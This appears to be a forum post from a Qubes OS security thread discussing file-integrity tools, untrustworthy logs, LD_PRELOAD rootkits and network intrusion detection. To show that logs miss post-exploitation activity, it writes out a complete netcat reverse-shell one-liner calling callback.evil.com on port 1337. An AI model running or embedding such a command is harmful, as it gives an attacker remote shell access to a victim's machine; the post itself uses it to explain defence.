Wish I had no daytime job
Same here.
Anyway, “installing tripwire/aide in dom0” would not add much to the actual security. First of all, there is no baseline and no understanding of what is ok to change and what is not and you will end up flooded with an endless stream of meaningless alerts.
When I find time to install tripwire
in a vaultVM (as a test environment similiar to dom0) I’m going to check it out. I haven’t looked into tripwire so far, but if it does what I suspect it to do (checking for changes in binaries) and we do not have any networktraffic in a vaultVM (dom0) there should be no alerts at all. rkhunter
could do the same, however it’s database storing binary hashes can be messed with. I actually believe any linux distro should check binaries integrity by default during or just before runtime (not only during install).
Log collection and processing […]
I don’t trust logs when it comes to the question “have I been hacked?”. I’m not even sure if a
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc callback.evil.com 1337 >/tmp/f
is going to leave a trace in any of your logs in case your browser gave me RCE. I suspect not.
Since an attacker can sudo in a qube-vm [1] it takes only a few seconds to implant a LD-rootkit [2] and from there on he or she is invisible. Without an exploit outsmarting the read-only filesystem of the templates this rootkit can not achieve persistance, though.
Rootkits, firmware- and UEFI-maleware are not going to leave a trace in any of your logs. Therefore one needs snort
or suricata
running on his or her router, preferably a router based on OpenBSD. And then it is a question how stealthy the maleware works… does it send screen-captures resulting in tons of UDP-traffic, does it send only your keystrokes over encrypted https traffic to some AWS instance, use a twitter-instance to exfiltrate only a few bytes everytime there is traffic to their servers, and/or use domain-fronting to hide, and so forth. Things can be difficult, not to talk about false positives.
Although we got a bit carried away from the question the OP asked I pretty much enjoyed reading and contributing my 5 cents to this thread.
[1] Passwordless root access in qubes | Qubes OS
[2] Memory Malware Part 0x2 — Crafting LD_PRELOAD Rootkits in Userland | Medium